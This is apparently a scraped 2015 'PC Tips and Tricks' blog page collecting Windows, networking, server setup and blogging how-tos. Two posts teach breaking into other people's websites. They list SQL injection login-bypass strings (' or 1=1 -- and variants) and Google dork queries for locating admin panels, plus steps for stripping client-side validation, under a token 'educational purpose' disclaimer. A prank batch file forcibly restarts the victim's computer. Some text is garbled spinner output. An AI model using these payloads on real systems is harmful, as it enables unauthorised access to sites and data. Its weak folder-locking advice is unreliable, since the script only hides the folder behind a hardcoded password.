PC TIPS AND TRICKS

αℓℓ αяє ωєℓ¢σмє тσ συя ѕιтє:
נσιη υѕ αη∂ Ⴣαιℓє συя ѕєяνι¢єѕ
lyk us on fb to get updaed:

Sunday 14 June 2015

How To: Change Your Ip In Less Then 1 Minute

How To: Change Your Ip In Less Then 1 Minute

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Read More

HOW TO RESET WINDOWSPASSWORD

Method 1:
§  Go to Control Panel and click on the Administrative Tools.
§  Under this section double click on Computer Management.
§   Select  System Tools from right window pane.

§  Under this, just double click on Local Users and Groups and then on Users
§  Now you will see all the login accounts of your computer. Right click on any the account whose password you want to change and then click on Set Password.
§  warning message will popup on your screen just click on Proceed button.

§  Now enter your New Password  and click on OK button.

That’s it! your windows 7 password is changed without knowing current password. The only limitation of this method is that your current  account should  have Administrative privileges.
Method 2:
If you love to be work on Command Line then this method is for you.
§  Open command prompt by typing with administrative privileges .( Type CMD in start, right click on it and select Run as Administrative )

§  In the CMD window  type the following command and  hit Enter
net user Account Name Your New Password
In this command replace Account Name by the account name (Account Name is case sensitive) whose password you want to change and replace Your New Password by the password that you want to set.

§  Now if everything goes alright  you will see “The command completed successfully” on your screen, now type exit command and hit Enter
This will reset your current windows password.



Read More

Wednesday 27 May 2015

How To Setup Your Own Dns (Domain Name Server)


This is only a quick tutorial, there are literally hundreds of little tricks you can do with a DNS, but this will get your basics up and running. I'm assuming you want to setup a windows DNS server, but the principals will work for most servers.

You will need..
  
                               


1) A domain name over which you have full control                                  
2) DNS server software(Windows server always comes with one of these)
3) At least one fixed IP address, allthough two is highly desirable            
4) An idea of what services you want on your server                                   

The first thing you need to do is create your new domain entry. In windows this is called a "Zone" and you will have one for every domain name you have. Add your main domain in the forward lookup zone as a Primary zone, which will be in the format "Domainname.com", or .co.uk, or whatever, you shouldn't need any more details for this bit. Do *not* allow dynamic updates unless this is a local network DNS. Once it is created you will have 2 entry's under your new domain, "SOA"(Or Start of Authority) and "NS"(Or Name server). If you want a 100% compliant DNS then you should now follow the same process but adding a domain as a reverse lookup zone. Any changes you make to the forward lookup should have the "Update Reverse Lookup" option ticked if its available, if not you must update the reverse zone manually(This is very important).

Now edit the "NS" entry in your forward zone to "NS0.DomainName.Com", and set it to the relevant IP address. Add another (NS) record and set it to "NS1.DomainName.Com". If using 2 IP address, try to make NS0 the first IP. Now you need to configure the SOA entry in the forward lookup zone. The serial number should be changed to a date followed by a number in this format "YYYYMMDDnn", this is not required, but is advised by RIPE. The primary server will be the "NS0.domainname.com" entry you just made and the responsible person should be left for now. The refresh interval should be set somewhere between 1200 to 43200 seconds, the retry should be between 120-7200 seconds and the expires after should be around 2-4 weeks(I'll let you work out the seconds for that). The minimum TTL is quite important, and depending on what you are going to do with the domain, you might need to tweak this a bit. Typically a value between 1-3 hours should be used. Now go to your "Name server" settings in your SOA record(In windows this is a tab in the same window) remove the defaults, and add your two Name servers that you just setup. We will come back to the SOA record later, but for now we need to do some more stuff.

If you want a website, then your going to want the WWW. setting up. We will set it up as an "A" record, which means it is a separate top level record and will be populated separately from other entries. So add an "A" to your forward lookup zone and put the entry as "WWW", and set the IP address to wherever you want the website to be. This will be where the domain always goes, and it could be anywhere. Just make sure there is a web server waiting there for it. If you want FTP, then setup the same thing but with "FTP" in the entry. You will now also have to setup "A" records for the NS0 and NS1 name servers that you added previously, just make them the same as WWW and FTP, but make sure the IP addresses match the ones used for setting up the "NS" records. Also add a blank "A" record, this will make sure that "domainname.com" works as well as "www.domainname.com".

Now you should decide whether or not you want to have mail on this domain. It is Hegel advisable that you set one up, even if it just to catch domain mail about abuse or potential problems that might occur. You can find plenty of high quality free mail servers out there, but I would recommend "Mail Enable", its free and provides everything you would want, but if you want webmail you do have to pay something extra for it. We will now configure the MX records. Add an "A" name for your mail server, you can add 2 if you want, but for simplicity I would advise staying with 1. We will call ours "Mail.domainname.com", and point it to one of our IP addresses. Now add an "MX" record in the Forward Lookup zone, giving it the full "A" record you just entered "Mail.domainname.com", and do not setup a host or child domain, just leave it blank.

This next step isn't needed, but is again highly recommended.

Now to finish the SOA you need to add two more records. A "RP" entry, which is a Responsible Person, and they will be the contact point for domain complaints and a "MB" entry, which is a mailbox entry. The "MB" should just be pointed to the mail server domain name "Mail.domainname.com", and the "RP" should have the host or domain set to the name of your mail box. So for this server it will be "Tony.Domainname.com", and the mailbox will be set to the "MB" record you just made. Don't worry about the RP address having no "@" in it, this is the expected format for an "RP" entry. You will now have to go back into the SOA and change the responsible person to the new "RP" record you just made.

And thats it, your done! You can add as many "A" records as you like to point to other web servers, or a multitude of FTP sites. And you can add "CNAME" records to basically point to another name, usually an "A" record, like an alias.

Now before you switch your domain on, you need to check that the server is performing properly. So go to www.dnsreport.com, and run the report on your domain "domainname.com", and it will give you a very detailed report of any problems, and even a short description of how to fix the problems. If all is OK, then you are ready to go live. If your domain name is new, or not currently hosted anywhere then the first thing you should do is re-point the domain at your new server. You will typically do this with the provider who owns the domain, and it will be different with all hosts. But the basic settings are the same. You will be asked for at least 2 name servers and ip addresses to go with them. Just put in "NS0.domainname.com" and "NS1.domainname.com" and put in the correct IP addresses. Make sure you do not mess this up, as changes to your main NS servers could potentially take several days to straighten themselves out. Update these settings, and then sit back and wait. You can do a whois on the main DNS server of your domain provider to check if the settings have worked, but again this doesn't always work. For the big 3 domains(.com .net .org) you can do a whois on the network associates site to see the changes instantly. You can also track the progress of the domain changes by doing an NSLookup in dos, like this...

c:\nslookup ns0.domainname.com NS0.yourprovidersdns.com

That will give you the entries your domain provider has

c:\nslookup www.domainname.com ns0.domainname.com

And this will tell you if the changes for your domain have gone through to your ISPs DNS yet. It should give you back the IP address of your new DNS server.

You should always make sure your server is backed up, and that you refresh or update the DNS when you are making changes.
Read More

HOW TO SETUP YOUR OWN HOME SERVER

Setup Your Own Home Server - Introduction:

Introduction

In this tutorial you will learn how to step up your own server. This server will be comprised of Apache 1.3.5, PHP 4.2.0, and MySQL 3.23.49. This tutorial will address the basic setup of a

server on your own computer. This means the removal of hassles of dealing with the company that is running a remote web server. It will be easy to modify. You can add any thing you want to it, be it CGI/Perl, Zope, Roxen, etc, all by your self. You will have unlimited disk space, well at least as big as your hard drive is =) Now that you know the advantages, it is time that I tell you what i used, and what you will need.

What I used
* Windows 2000 - NOTE that if you are using 2k you WILL NEED Administrative Privileges. If you don't then get them somehow =) If you are on 95, 98, NT, XP, ME, I
* Apache 1.3.6 - I tried to use 2.0 but I could not get it work. I also feel that 1.3.6 is tried and true, so why mess with greatness.
* Mysql 3.23.49 - The newest version of MySQL when I set up my server. MySQL also the is the best PHP supported Database, and well love PHP don't we.
* PHP 4.2.1 - The latest and greatest PHP release. -nt

What you will need
* Apache 2 - Link: h**p://www.apache.org/dist/
* Mysql 3.23.49 - Link: h**p://www.mysql.com/downloads/mysql-3.23.html
* PHP 4.2.0 - Link: h**p://www.php.net/downloads.php
* Windows - This tutorial is ONLY written for new versions of Windows.

Once you have downloaded all the programs you are ready to continue.

1. Installing Apache

Installing Apache

The first step is to download Apache for Windows. Before you install it make sure that any other server software is removed. Remove it all via the control panel.On

Once you have clicked on the executable, a screen should com up that looks like this. Go ahead and click on next



Of course you plan to abide be the license agreement, so click on I accept.... and click on next.



You really don't need to read this, but if you want you can. Read it if you want feel informed. When you are ready click on next.



Here is where the actual setup of Apache begins. For Network Domain put in localhost as for Server Name You want these both to be localhost because the server is running locally, on your computer. It doesn't matter what is in email field, just put in yours. No one will no it because it's just you.



For the sake of this tutorial it is better to just leave it as it is because, later in the tutorial I will show you how to start the server with one click of the mouse, and for the sake of ease, it will be easier for you to follow along. You can change it if you want, but you will have to realize where to substitute it. For me the root drive is E: but for you will probably be C:



Once you have all the jazz set up, it is time to install the server. If you are on w2k or XP be sure that you have Administrative permissions or you will get an error about half way through the install saving cannot access msvrt32.dll or something. If you get that error run it again when you have admin privileges. Once you are ready click on install.



If all went well you just see a screen similar to this. Now it is time to test the install of apache. Click on Start > Program Files > Apache HTTP Server and look for start Start Apache in Console. Click it. Once it says Apache XXXXX running, press Windows Key + R and type -http://localhost/. If the install works you should see a page saying that it works. If all is set and done, continue to the next step.


______________________________________________________________________
2. Installing PHP
Once you have clicked on the executable, a screen should come up that looks like this. Go ahead and click on next.



Of course you plan to abide be the license agreement, so click on I accept.... and click on next.

For this information, we will want the simple standard install. Chances are you if you are reading this tutorial, you will probably not even want to talk about advanced =)



This is the mail setup, just enter localhost, and me@localhost.com. These are not important, because you, the admin, are the only person that will use the server, and you will be the one handling errors.



We are going to want this install to work is Apache, so click on Apache, and move on.



Once you have all the jazz set up, it is time to install the server. If you are on w2k or XP be sure that you have Administrative permission or you will get an error about half way through the install saving cannot access msvrt32.dll or something. If you get that error run it again when you have admin privileges. Once you are ready click on install.



After the install is done you should get something that says you will have to manually configure apache to use php. Assuming you have a working Apache server installed, make sure that it is not running. Navigate to C:\Program Files\Apache Group\Apache\conf\ open the httpd.conf file. Note that you can also get to the http.conf from the start menu. Start > Program File > Apache HTTP Server > Configure Apache Server > Edit the Apache httpd.conf Configuration File and the window will open up in notepad. Now hit Ctrl + End if you see something like what follows, you can skip this step. If you do not see that code, copy it. This code will only work if you used the default install folder when you installed php. If you did, copy that code and paste it into the end of the file. Select the code to right, and hit ctrl + c , then go into the httpd.conf file and hit ctrl + v and save the file.

ScriptAlias /php/ "c:/php/"

AddType application/x-httpd-php .php .phtml

Action application/x-httpd-php "/php/php.exe"

Now that we have php installed, it is time to test it. Open up notepad and type the code to the right. Save it as phpinfo.php. Remember to set it as all files in the drop down menu, or the file will be a text file. Save in the Directory: C:\Program Files\Apache Group\Apache\htdocs. htdocs is the directory where all the files go. You can create endless dir's and browse them. For Example E:\Program Files\Apache Group\Apache\htdocs\mydir\myfile.php could be accessed as http://localhost/mydir/myfile.php. Once you have that file saved. You will need to start the Server. Click: Start > Program File > Apache HTTP Server >; and look for something like Start Apache in Console. After you have found it, launch it. You should get a window saying that Apache is running. Now go to Start > Run > and type in -http://localhost/phpinfo.php. If you don't see anything, php is not installed correctly. If php is installed correctly, you will see a few large tables, displaying php's configuration. Now Your are 1/2 done!
______________________________________________________________________
3. Installing MySQL
Once you have clicked on the executable, a screen should com up that looks like this. Go ahead and click on next.



Of course you plan to abide be the license agreement, so click on I accept.... and click on next.

Just like before you should leave the default dir alone, so you will be able to follow along with me when I show you how to start and stop all the aspects of the server.

Stay with the typical installation. Just like before, if you don't have admin privileges, the install will be faulty. After you click next, the install will begin. After the install has finished, move on to the next step.

Now you have to set up the root account. The root account is the absolute admin of the system, the highest possible. Click on Start > Run and type cmd to open up the command prompt. You are going to have to navigate to where MySQL is installed. Type C: > Enter > cd mysql > Enter > cd bin > Enter. Now you have to tell setup the root settings. Type mysqladmin -uroot password InsertYourPasswordHere then hit enter.


What is the point of having a database if you can't easily administer it! That is where phpMyAdmin comes into play. phpMyAdmin is a free piece of software written in php that makes the administration of a mysql or many other types of databases easy. You will want to download (h**p://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.6-php.zip?downloadrelease_id=85832)the latest version. Save it in the htdocs folder. Once it is done downloading it, right click on it and select Extract > To Here. When it is done you should end up with a directory in the htdocs folder called phpMyAdmin-2.2.6 To make it easier to access, rename it to phpMyAdmin. After you have renamed it, click on it and look for a file called config.inc Open it. This is where you set the configuration of phpMyAdmin. When you open it up, it should look similar to the image to your side. On yours there should be a few things missing. The $cfgPmaAbsoulteUrl and $cfgservers[$i]['password']. You will need to fill those in between the quotes. for the $cfgPmaAbsoulteUrl enter -http://localhost/phpMyAdmin/ if you followed my instructions to the letter. If you did not rename it or extracted to a different directory, put that in there. For the $cfgservers[$i]['password'] enter the password you entered when you were setting MySQL in the set above. You can refer to the image for help. After you have put the right things in save the file.


Now we want to test the install of mysql, php, phpmyadmin, and apache all at once. Start apache in console like we did before. Now, you are going to need to start mysql. For myself I made a file that would start mysql for me. Open notepad and type: start c:\mysql\bin\mysqld-nt.exe --standalone and save that as Start MySQL.bat. Once you have saved it, click it. A window should open and then close. Mysql is now running on your computer. After mysql and apache are started go to run again and type -http://localhost/phpMyAdmin/index.php and if everything is installed correctly phpmyadmin should so up. You are almost done! Now we have the easy part =)

4. Finishing it all up

Wow! We mad it through the whole process. Now we want to simplify the whole process of controlling the server. I made a toolbar with all the things I needed. I made a new folder on my desktop and called it Server Folder and put all the stuff there. I made a new shortcut and gave it a value of -http://localhost/ made a shortcut to the PHP Documentation page. Another shortcut to my php editor, which is now unavailable. The phpMyAdmin shortcut is set to -http://localhost/phpMyAdmin/index.php. I made another shortcut htdocs. I moved the Start Apache in Console program that was in the start menu folder and moved it to the server folder. You can take the Start Mysql file you made in the last page and move it to the new folder. After you have put all the desired things into that folder, right click on a blank space in stat menu task bar (where the program boxes lie) and select Toolbars > New Toolbar and navigate to the folder. Voila!

Now all you have to do is click Start Apache in Console , Start Mysql, and Lauch browser
Read More

How To Make pendrive bootable using CMD

Just follow this steps to create your pendrive bootable exploitation CMD command

FOLLOW THESE STEPS:

Beginning is to get the windows files from somewhere and save them to a folder in your computer. you'll be able to rip a windows optical disc , or if you have got the iso image file you'll be able to open it with magic disc or daemon tools or perhaps winrar , and you would like to repeat the total content to a folder anyplace in your computer , you simply got to make certain you recognize wherever it's situated.

make certain your usb stick is inserted, head to begin search cmd , right click the file and choose run as administrator. The electronic communication can seem, currently you would like to put in writing the subsequent comands:
diskpart→list disk→select disk 1(chose the usb device, {you can|you'll|you may} acknowledge it by its size)→clean(this can erase the usb)→create partition primary→select partition 1→active→format fs=ntfs(this will format the usb drive and can take 10-15 minutes)→
when the format is completed you have got to continue writting in command promt : →assign(now {you can|you'll|you may} notice that the usb drive modified its letter to (H): or (G))→exit(this command will exit the disk part function)

currently you have got to put in writing the trail to the feasible go into your windows saved folder , make certain that in your windows folder you have got the boot folder with the bootsect feasible file.
In my case the command goes like this: E:→cd win seven sp1→

→cd boot→bootsect.exe/nt60 h:(h is that the letter of the usb drive ,this comand can update the boot core)→exit (this can exit command prompt).


Now you have got to repeat all the files within the windows folder to your usb drive.

ALL DONE. you'll be able to currently restart your computer and boot from the usb drive
Read More

HOW-TO HACK WEBSITES


To hack a password protected website you don’t need the knowledge of code. Here i will teach you How to crack a website or how to access a password protected site. By this trick you can make your friend fool! There are some simple stapes to gain the admin password and user name. In my previous post I already taught you Google dork. I mean how to hack a site using Google dork. I gave you the Google dork codes in my previous post 

                          


Hacking a website


Find the admin panel of the site you want to hack and then follow the steps:


1. Open the site you want to crack Provide anything in username/password combination in its log in form. (like Username : admin and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be ready your experiment starts from here.

2. Right click anywhere on that error page >>>> then>>go to view source.

3. There you can see the HTML coding with JavaScript. There you find fairly like this....<_form action="...Login...."> before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.urtargetwebsite.com/login")

4. Then delete the JavaScript from the above that validates your information in the server.(Do this very wisely, your success to hack the site rest on upon this i.e. how efficiently you delete the java scripts that validate your account information)

5. Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=password>" with "<_type=text>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )

6. Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\Bpl.html)

7. Reopen your target web page by double clicking 'Bpl.html' file that you saved in your hard disk earlier. You see that some changes in current page as compared to original One. Don't fear.

8. Provide any username [like: hacker] and password [like :' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.

NOTE: This is For Only Educational Purpose











Read More

HOW to Hack a website using Goggle Dork


Google dork hacking is yet another  easiest way to hack a site. There are many ways to hack a website but at first every hacking learner should learn the Google dork. Here you will learn how to hack a site.The steps are easy. follow the steps given bellow 


step 1 : Go to www.google.com


step 2: Search the “inurl:admin.asp


step 3: now go to any site you like(Ex:labnol.com/admin)


step 4: so here you have to give user name and password
            use this >>username: admin
             password: 'or '1'='1
now you can succesfully access the admin panel now you can change everything you want to.
but if you fail ,go to another site cause that site has no vulnerability


 some other  google dorks

search :


“inurl:admin.asp”

“inurl:adminlogin.php”
“inurl:adminhome.php”
“inurl:admin_login.php”

“inurl:admin/login.asp”

“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
“inurl:admin.php”
“inurl:login/admin.php”
“inurl:admin/login.php”
“inurl:administratorlogin.php”
“inurl:login/administrator.php”
“inurl:administrator_login.php”


username : 
admin,
admin123, 
admin1234
password:


' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'


NOTE: use this on your own risk. i learn you only for educational purpose.
Read More

HOW TO EARN MONEY ONLINE EASILY


 we search on the online 'how to earn money' but i don't get the right way.For this reason we fail to earn dollar from a website or blog. In this post i will show you how to earn rupee(money) in the internet.

The are many market place in the world but few are trusty and the are

            1.Google Ad sense
            2.Yahoo Publisher
            3.Ad Space Rent
            4.Link Shortening
            5.Affiliate Marketing

Google Ad sense : It is a program of Google and they serve content related ads on your blog if you follow their rules and when visitors click  or see these ads you will be paid by Google Ad sense.

Yahoo publisher: Yahoo publisher is a program of Yahoo and it also serves content related ads on blogs. Its features are as same as Google Ad sense. You can also try it with Google Ad sense ads in your blog. I am telling you to use it beside Google’s ad because it also serves high quality ad who’s Cartesian Perceptual Compression is also very good.

Rent AD Space: If there are lots of unique visitors in your blog daily then it is very easy to rent ad space in your blog. You can earn 100-1500$ from renting ad space in your blog. Go to digital point forum there you will get lots of interested people. The digital point forum is a good market place also. Or you can try warrior forum. Those two are the best market place for blogger and internet marketer.
Read More

TOP RUN COMMANDS

There are many run command which is very helpful but we forget the command:

commands you can type into the Run dialog:
  •  To Run Calculator calc
  •  To Run Command Prompt cmd
  •  To Run Firefox (if installed) firefox
  •  To Run Internet Explorer iexplore
  •  To Run Microsoft Word (if installed) winword
  •  To Run Microsoft Excel (if installed) excel
  •  To Run Microsoft Outlook (if installed) outlook
  •  To Run Notepad notepad
  •  ToRun Wordpad wordpad 


  •  To Open Control Panel control panel
  •  To Open Program Files folder %programfiles%
  •  ToShutdown Windows shutdown
  •  To Restart Windows shutdown -r
  •  To Log Off Windows logoff
  •  To Registry Editor regedit
  •  To Task Manager taskmgr
  •  To Windows Update Launches wupdmgr
  •  To Creating Your Own Run Commands

If you are like me, you will use a few programs very frequently. One way to make them start faster is to give them their own Run command:

1. Win+R to open the Run dialog
2. Enter %windir% to open the Windows directory
3. Alt+F W S to open the File menu, choose the New menu item, then the Shortcut menu item
4. Go through the wizard to create a shortcut to the desired program
5. The name you give the shortcut is what you type in the Run dialog to start the program

Infrequently Used Run Commands

Below are a list of commands you can type into the Run dialog, split into several categories: programs, control panels, computer administration tools, and special folders.
Programs

Character Map charmap
Check Disk Utility chkdsk
Clipboard Viewer clipbrd
Free Cell freecell
Hearts Card mshearts
Microsoft Chat winchat
Minesweeper winmine
On Screen Keyboard osk
Remote Desktop mstsc
Spider Solitare spider
Telnet Client telnet
Windows Magnifier magnify
Control Panels

Accessibility Controls access.cpl
Add Hardware Wizard hdwwiz.cpl
Add/Remove Programs appwiz.cpl
Administrative Tools control admintools
Automatic Updates wuaucpl.cpl
Date and Time timedate.cpl
Display Properties desk.cpl
Folders Properties control folders
Fonts control fonts
Fonts Folder fonts
Game Controllers joy.cpl
Internet Properties inetcpl.cpl
Keyboard Properties control keyboard
Mouse Properties control mouse
Network Connections control netconnections
Network Setup Wizard netsetup.cpl
ODBC Data Source Administrator odbccp32.cpl
Password Properties password.cpl
Phone and Modem Options telephon.cpl
Power Configuration powercfg.cpl
Printers and Faxes control printers
Printers Folder printers
Regional Settings intl.cpl
Scanners and Cameras sticpl.cpl
Security Center wscui.cpl
Sounds and Audio mmsys.cpl
User Account Management nusrmgr.cpl
Windows Firewall firewall.cpl
Computer Administration Tools

Computer Management compmgmt.msc
Device Manager devmgmt.msc
Disk Cleanup Utility cleanmgr
Disk Defragment dfrg.msc
Disk Management diskmgmt.msc
Disk Partition Manager diskpart
Dr. Watson System Troubleshooting drwtsn32
Driver Verifier Utility verifier
Event Viewer eventvwr.msc
Group Policy Editor (XP Prof) gpedit.msc
Local Security Settings secpol.msc
Local Users and Groups lusrmgr.msc
Performance Monitor perfmon
Resultant Set of Policy rsop.msc
Scheduled Tasks control schedtasks
Services services.msc
Shared Folders fsmgmt.msc
System Configuration Editor sysedit
System Configuration Utility msconfig
Utility Manager utilman
Windows System Security Tool syskey
Computer Administration Tools

Application Data Folder %appdata%
Home Directory Drive %homedrive%
Home Directory %homepath%
Shared Home Directory %homeshare%
Temporary Folder %temp%
Windows Root Drive %systemdrive%
Windows Root Directory %windir%


Take the ipconfig command for example. If you were to type that into Run, it would open a command prompt, run the ipconfig command, and then close because the command finished running! To fix this, type cmd into the Run dialog, and then type ipconfig into the command prompt.There are many codes but you have to know them and also you have to know how it works and how you would be benefited
Read More

Sunday 24 May 2015

How To Create A Fake Funny Virus iN nOTEPAd


How To Create A Fake Virus

1. Open Notepad (Click on start menu and select run, type notepad and press enter
2. Now Copy and Past below comment.

@echo off  msg * Warning!!! All your computer data will be deleted within 5 minutes. To save your files from deletion immediately press the OK button (This message from onlinetrick). shutdown -r -t 10-c "Sorry!!! Cannot abort the deletion process. The files have already been deleted..."
3. In the above command, i am write 10 second that mean after 10 second your system will be restart. You can change to your desired value. You can also change the messages and set them to anything you want to display on the computer screen. [ see image below ]
4.Now save the file with any desired name but it should be end with .bat. For example,check.bat 
So, whenever someone will open the file by double clicking on it, the script written in the file will be executed automatically and the system will be restarted after the specified number of seconds. 
 Note:-  It is just a fake virus that displays a message on your system and restarts it. It is not harmful your system or laptop. After it restarts your system, it will work normally again, 
Share and Enjoy !
Read More

HOW TO -UNLOCK FILES AND FOLDERS WITHOUT ANY SOFTWARE

There are lot of ways to lock folders on computer. But in this article we going to showing you, how to lock folder without any software. it's very easy to protect your valuable folders and you can enhance your folder secure. In the earlier we mentioned, how to ENABLE OR DISABLE usb DRIVES, that method is using USB Secure software. But in this tutorial no need to use any software. Just adding batch code in notepad.How To Lock Folder Using Notepad
1. Open Notepad file.

2. Copy the below code and Paste it in notepad.

cls:End@ECHO OFFtitle Folder Lockerif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCKif NOT EXIST Locker goto MDLOCKER:CONFIRMecho Are you sure u want to Lock the folder(Y/N)set/p "cho=>"if %cho%==Y goto LOCKif %cho%==y goto LOCKif %cho%==n goto ENDif %cho%==N goto ENDecho Invalid choice.goto CONFIRM:LOCKren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"echo Folder lockedgoto End:UNLOCKecho Enter password to Unlock folderset/p "pass=>"if NOT %pass%==123456789 goto FAILattrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Lockerecho Folder Unlocked successfullygoto End:FAILecho Invalid passwordgoto end:MDLOCKERmd Lockerecho Locker created successfullygoto End

In the above batch code we added password is 123456789and you can change that password.
3. Now save the notepad file as yourname.bat , (see below) 
4. Now a batch file will created in where you saved location.
5. Open that batch file, at the same time you will see Locker folder, 
6. Now store your personal files like pictures, videos, documents, etc... 
7. Once again open batch file to lock the stored file in folderNow press Y and press Enter.
8. Now your folder will be invisible and protected. but batch file be there.
When you want to unlock the folder, then again open batch file and enter your password   


Read More

HOW TO Remotely Access Your Computer or Share Your Screen With Others Using Chrome Extension





Today I found an awesome chrome extension called Chrome Remote Desktop in which the chrome user can remotely access another computer or allow your friends to share your computer screen with him safely on Internet through chrome browser or chrome book. Although there are numerous software available on web to share you PC screen with your friends like TeamViewer, it is an popular software. But this extension can work though online.

Chrome Remote Desktop is an awesome tool for chrome users to share their screen with others. It's have many good features which are user friendly. That do amazing work between two computer like copy-past ability, conference calls as well as live radio feed for music share.

In this post I will show you how to install and share your computer screen with others safely on the Internet. If you are sharing screen with your friends, then the both computer should have installed this Chrome Remote Desktop on the chrome browser and ensure the chrome is the default browser on both system. lets check it.

How To Remotely Access Computer and Share Your Screen With Others
1. Download and Install the Chrome Remote Desktop extension on your chrome browser.
2. Now open new tab and click Chrome Remote Desktop icon. Then you have to authorize the extension with your Gmail account and grant it permission.
3. You can see two section. One of it is Remote Assistance means share your computer screen with others and another one is My Computers means access your computer remotely from anywhere on the world.

4. To share your screen with others, hit Get started under the Remove Assistance and get unique 12 digits for partner to access your computer. That's all.
Read More

How To Convert YouTube to mp3 online


. Now a day people want to hear the mp3 songs instead of video songs because nobody as much time to spend while watching the video that is the reason why people search on Google about convert YouTube to mp3. This problem has been most common.There are many software and web application available on the Internet that is providing YouTube converter facility. Most of are on premium with a bundle of new features. Some of the software and application are free to make their place in the market.

Some of the website has a confusing interface that creates difficulty to use the website. Many ads are posted on those websites to earn monthly revenue through the clicks on the website by the admin. Therefore, people become unable to use their websites. Some websites have given user-friendly interface and their rating is getting higher day by day.


pc tips RECOMMEND FLVTO.COM TO CONVERT YOUTUBE VIDEO TO MP3 EASILY

It is very simple to convert YouTube to mp3 online by those user-friendly websites. Let us take a brief example how to convert YouTube to mp3 online. First, search the website through the Google by putting this keyword. “Convert YouTube to mp3 online” then you will find the list of website click on the website and find any easy user interface website. They will ask you to put the URL of that video which you want to convert into mp3. Put the URL and click on the button of converting. It will take a few minutes to convert your video into mp3. Then you can see having played it on mp3 player. Those website convert YouTube mp3 in high quality. Try out this website to solve your problem by YouTube Converter.

Mostly these problems are posted in forum by those people who are not aware of these sorts of websites, who provide a free service to the user to convert YouTube to mp3 online. The basic object is to provide the facilities to the user to convert their YouTube video to mp3 by using these websites. Some of the people thinking that in spite of all those things what is the benefit to a website owner to give this facility to the user.

The answer is that when you open the website to convert YouTube to mp3 online. They give pop-up ads on which you click suddenly and the charge certain amount on behalf of your click on ads. Thus this is cause behind they are offering their services free to the people. Therefore, they can make lots of money by the user click on ads. Without the resource of revenue, it is impossible to run the website. Now there are many software available by which you can make directly download and convert from the YouTube website.

YouTube mp3 converter always become useful for the user to convert the song video song by just posting the URL of the on the grid on converter website. Try it out to have your own song collection by the YouTube video. The most reliable place to find every song is YouTube.
Read More

how to enable auto reply message in google GMAIL


HOW to enable auto reply message in google GMAIL


Are you busy at work? or your business? And want to send reply message for your incoming mails automatically? If yes. You are in right place to solve your question. You might didn't notice that Gmail providing an awesome tool called vacation responder which send auto reply message for incoming mails.

For example: You are planing a trip to beautiful place but still there haven't Internet yet. You are getting few important mails and want to reply those mails soon after they send.
or
You have being working in a service like help desk, blog etc. You may get numerous queries through email. You can not reply those email at the same time. But you want to impress them to wait your response later with auto reply message like below message (image).



Here I will show you how to setup vacation responder which will automatically reply to anyone who emails you step-by-step guide.

Login your Gmail account.

Click setting at the top right corner drop down menu.
From General tab. Scroll down the page and find vacation responder.
Select vacation responder on as shown image below.
Now set the Duration, Subject, and Message body. Those you written words will be included in auto reply message. So add impressing words which make senders to wait your response soon.
[Optional step] check mark Only send a response to people in my Contacts , if you want to avoid auto reply for those out of your contacts.
At last Save it

That's is it. Now your are jumped from soon reply to message. This auto reply message will make the senders to wait your mail.
Read More

How-To track Page Views of blog

Google Analytics
Google Analytics is the powerful web analytic to track your blog performance and traffic as well. It's developed by Google and free to use. From Google analytics, you can see your complete blog statistic like traffic, sources, content, SEO, etc.,

Every blogger should track the blog to get more information about from visitors come to your blog? which are most viewed post as well as how much time visitors stay in your blog. So I recommend to use Google analytics to track your blogger.

Although blogger have its own statistic for viewing your blog traffic, sources etc. But it is not much reliable and vast as compared to Google analytics. For blogger doesn't provide bounce rate while Google analytics does.

Today I will show you how to add your blogger blog in Google analyitcs easily. With 10 step you will be full able to track your blogger and see blog performance.

First of all login your Google account, then follow the steps below.

1. Go to Google Analytics and click Create an Account at right of top menu
2. Again click Sign up at right side in a small box
3. Select Web site as you would like to track and choose Universal Analytics as tracking method for better tracking.
4. Fill up the some fields given, such as your site name, site URL, category etc. (see image below) 

5. Click Get Tracking ID button and one box will popup. Read terms and click I accept.
6. Now you will get Tracking ID and copy the Tracking code given in a large box. Do not close the analytics window (tab).
7. Go to blogger > template > edit HTML >
8. Find (Ctrl + F) </head> and Pasts the copied code before it.
